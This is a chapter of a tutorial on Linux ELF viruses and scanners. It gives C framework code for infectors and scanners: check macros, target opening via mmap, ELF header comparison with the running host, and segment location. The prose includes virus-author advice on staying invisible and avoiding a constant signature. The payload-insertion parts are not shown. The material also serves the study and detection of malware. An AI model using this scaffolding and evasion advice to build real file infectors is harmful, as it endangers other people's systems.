3. One step closer to the edge (i)

 

To take a significant step forward, you must make a series of finite improvements.

 Donald J. Atwood, General Motors

This chapter introduces a framework for scanners and first stage infectors, written in plain C. The code is split it into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Here you will find only the most basic parts shared by all programs. A few functions common to all infectors are in Scratch pad (i), the rest accompanies descriptions of infection methods in separate chapters.

The code is not insertable itself. Doing it in C describes what would be necessary. In the meantime the infectors insert and activate one chunk of code, an array of byte prepared by Dressing up binary code.

Target file names are specified through stdin, not as command line arguments. This is required to scan crowded places like /usr/bin in one go. Anyway, Scanners (i) check executables for irregular layout, not signatures.

Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in generated file config.h. See Verifying installed packages. If you need full details I can only recommend a look into the sources of this document. Mirrors shows where to get it.

This code really wants to be C++. Some hardware I'm working on is just too slow for big compilers, though. The heavy use of macros is a consequence of not using C++, not the reason.

3.1. print_errno

A simple replacement of perror(3). If the first argument is -1 instead of errno(3) the function works just like printf(3).

3.2. Conditional output

printf(3) is a great debugging tool. I use it similar to assert(3). A single pre-processor definition deactivates them all. Or rather groups of them. The conventional way to completely remove function calls through the pre-processor is to define a parameterized macro that evaluates to nothing. But then printf takes a variable number of arguments. Recent C99 standard provides a mechanism to handle this. The gcc extension for the same purpose is much older but different (pronounce as "incompatible").

I chose obscure syntax instead.

3.3. trace_infector.h

3.4. trace_scanner.h

3.5. target.h

This is the central data structure used by all examples based on this framework. Not all struct members are used by all programs, though. And obviously scanners have no use for a byte array called infection.

3.6. check.h

None of these programs are ready for end-users. They are intended as a base for experiments and have a tendency to accumulate weird bugs. If everything is well, terse output is efficient. And when things get rough, exact details, including location in the source, are more important than nice presentation.

Macro CHECK evaluates an expression built from a relational operator and two operands. If this condition is false then a diagnostic message is written. The first argument of CHECK is prefixed with TRACE_ to build the name of the function that actually writes the message. Expected effective values are either print_errno or (void), just as defined by the TRACE_ macros in trace_infector.h.

The message itself consists of four lines, all prefixed with "CHECK:". First comes the name of the target file. This relies on having a variable t point to a structure of type Target. This is followed by the source file and the line number of the CHECK statement that failed. The third line is the source code of the condition. And the fourth line shows the actual result of left and right operand, formatted both as %ld and %#lx. The operands are evaluated only once and then assigned to local variables of type long inside a separate block.

In the body of a macro the character # works as "stringification" operator to macro arguments; it surrounds its operand with double quotes. Unfortunately # does not accept brackets around the operand. To maintain the precaution that arguments in macros are evaluated only inside brackets we need an intermediate macro, QUOTE_EXP.

The predefined macro __LINE__ evaluates to the current line number. Since # works only on macro arguments and not arbitrary definitions we need an intermediate macro again. Unfortunately a simple QUOTE_EXP(__LINE__) evaluates to "__LINE__". The intended result requires another level of mediation through QUOTE_NUM. It is not possible to stringify the value of symbols declared through enum or const int.

Source: src/one_step_closer/check.h
#define QUOTE_EXP(n)	#n
#define QUOTE_NUM(n)	QUOTE_EXP(n)

#define CHECK_BEGIN(trace, left, op, right, errno) \
  { long _left = (left); long _right = (right); \
    if (!(_left op _right)) { \
      TRACE_##trace(errno, \
      "CHECK: %s\n" \
      "CHECK: " __FILE__ "#" QUOTE_NUM(__LINE__) "\n" \
      "CHECK: (" QUOTE_EXP(left) ") " QUOTE_EXP(op) \
        " (" QUOTE_EXP(right) ")\n" \
      "CHECK: %ld " QUOTE_EXP(op) " %ld; %#lx " QUOTE_EXP(op) " %#lx\n", \
      t->src_file, _left, _right, _left, _right);
#define CHECK_END	} }

#define CHECK(trace, left, op, right) \
  CHECK_BEGIN(trace, left, op, right, -1) return false; CHECK_END

#define CHECK_ERRNO(left, op, right) \
  CHECK_BEGIN(ERROR, left, op, right, errno) return false; CHECK_END

/*
 * wrappers for write(2) and lseek(2) that handle errors
 * used only in infectors and only on fd_dst
 */ 
#define CHECK_WRITE(buf, count) \
  CHECK_BEGIN(INFECT, count, ==, write(t->fd_dst, buf, count), errno) \
  return false; CHECK_END
#define CHECK_LSEEK(offset, whence) \
  CHECK_BEGIN(INFECT, -1, !=, lseek(t->fd_dst, offset, whence), errno) \
  return false; CHECK_END

3.7. main

The differences between infectors and scanners show in target_action #1 and print_summary #1, but not in main. On success each implementation of action will output a single line per target. The file name used in that case is a bit simplified. If the value of environment variable TEVWH_TMP is the prefix of a target file name then this prefix is cut off from success reports. Anyway, this is relevant only to scanners.

Array stat is an ugly hack to gather arbitrary statistics without having to define a different interface for every program.

Source: src/one_step_closer/main.inc
int main()
{
  Target t;
  unsigned stat[5] = { 0 }; /* ugly hack to gather statistics */
  const char* tmp = getenv("TEVWH_TMP");
  size_t len_tmp = (tmp == 0) ? 0 : strlen(tmp);

  while(0 != fgets(t.src_file, sizeof(t.src_file), stdin))
  {
    size_t len = strlen(t.src_file);
    if (len <= 0)
      continue; /* ignore empty lines */

    /* check that all lines fit in buffer and are terminated with '\n' */
    if (t.src_file[len - 1] != '\n')
      return -1;
    t.src_file[len - 1] = 0; /* we don't need the '\n', though */

    t.clean_src = (len_tmp > 0 && 0 == memcmp(tmp, t.src_file, len_tmp))
    ? t.src_file + len_tmp + 1
    : t.src_file;

    stat[0]++; /* total number of files */
    if (target_open_src(&t) &&
        target_is_elf(&t) && 
	target_get_seg(&t) && 
	target_action(&t, stat))
    { stat[1]++; /* number of succesful files */ }
    target_close(&t);
  }
  print_summary(stat);
  return 0;
}

3.8. target_open_src

Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between first and final modification contents of the target is invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted through a power failure (or emergency shutdown of a hectic admin).

There are a few approaches to change a file while copying.

Using MAP_PRIVATE for argument flags of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. On low memory conditions these pages can be discarded without saving them in swap-space.

Source: src/one_step_closer/open_src.inc
bool target_open_src(Target* t)
{
  TRACE_DEBUG(-1, "target_open_src\n");

  /* target_close() needs a few clean values, initialize them first  */
  t->fd_dst = -1;
  t->image.v = 0;

  CHECK_ERRNO(0, <=, t->fd_src = open(t->src_file, O_RDONLY));
  CHECK_ERRNO((off_t)-1, !=, t->filesize = lseek(t->fd_src, 0, SEEK_END));

  CHECK(ERROR, t->filesize, >, sizeof(TEVWH_ELF_EHDR));
  t->aligned_filesize = ALIGN_UP(t->filesize);

  /* can't use CHECK for mmap since it returns void*, not int */
  t->image.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE, MAP_PRIVATE,
    t->fd_src, 0);
  if (t->image.v != MAP_FAILED)
    return true;
  TRACE_ERROR(errno, "mmap(%s)", t->src_file);
  return false;
}

3.9. target_close

3.10. target_is_elf

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should go sure your code does nothing unexpected. On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus. SELF is defined in target.h.

Finding a meaningful set of tests is an art in it itself. For example some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.

Source: src/one_step_closer/is_elf.inc
bool target_is_elf(Target* t)
{
  enum { CMP_SIZE = offsetof(TEVWH_ELF_EHDR, e_entry) };
  TEVWH_ELF_EHDR* ehdr = t->image.ehdr;

  TRACE_DEBUG(-1, "target_is_elf SELF=%p\n", SELF);

  CHECK(SCAN, 0, ==, memcmp(&ehdr->e_ident, &SELF->e_ident, CMP_SIZE));
  CHECK(SCAN, ehdr->e_phoff, ==, SELF->e_phoff);
  CHECK(SCAN, ehdr->e_ehsize, ==, SELF->e_ehsize);
  CHECK(SCAN, ehdr->e_phentsize, ==, SELF->e_phentsize);
  CHECK(SCAN, ehdr->e_shentsize, ==, SELF->e_shentsize);

  return true;
}

3.11. target_get_seg

Finding code and data segment in a loop is really overkill. But this way we can do some general checks. See readelf & objdump for details.

Source: src/one_step_closer/get_seg.inc
bool target_get_seg(Target* t)
{
  TEVWH_ELF_PHDR* phdr;
  unsigned nr_load;
  unsigned nr;
  TEVWH_ELF_PHDR* phdr_data;
  TEVWH_ELF_PHDR* phdr_code;

  TRACE_DEBUG(-1, "target_get_seg\n");

  phdr = t->phdr = (TEVWH_ELF_PHDR*)(t->image.b + t->image.ehdr->e_phoff);
  nr_load = 0;
  t->phdr_dynamic = 0;
  for(nr = t->image.ehdr->e_phnum; nr > 0; nr--, phdr++)
  {
    switch(phdr->p_type)
    {
      case PT_LOAD: nr_load++; phdr_data = phdr; break;
      case PT_DYNAMIC: t->phdr_dynamic = phdr; break;
    }
  }

  CHECK(SCAN, nr_load, ==, 2);
  CHECK(SCAN, (long)phdr_data, !=, 0);

  /* both segments lie right next to each other */
  t->phdr_code = phdr_code = phdr_data - 1;
  CHECK(SCAN, phdr_data->p_type, ==, PT_LOAD);
  CHECK(SCAN, phdr_code->p_type, ==, PT_LOAD);

  /* a code segment with trailing 0-bytes makes no sense */
  CHECK(SCAN, phdr_code->p_filesz, ==, phdr_code->p_memsz);

  t->end_of_cs = phdr_code->p_offset + phdr_code->p_filesz;
  t->aligned_end_of_cs = ALIGN_UP(t->end_of_cs);

  return true;
}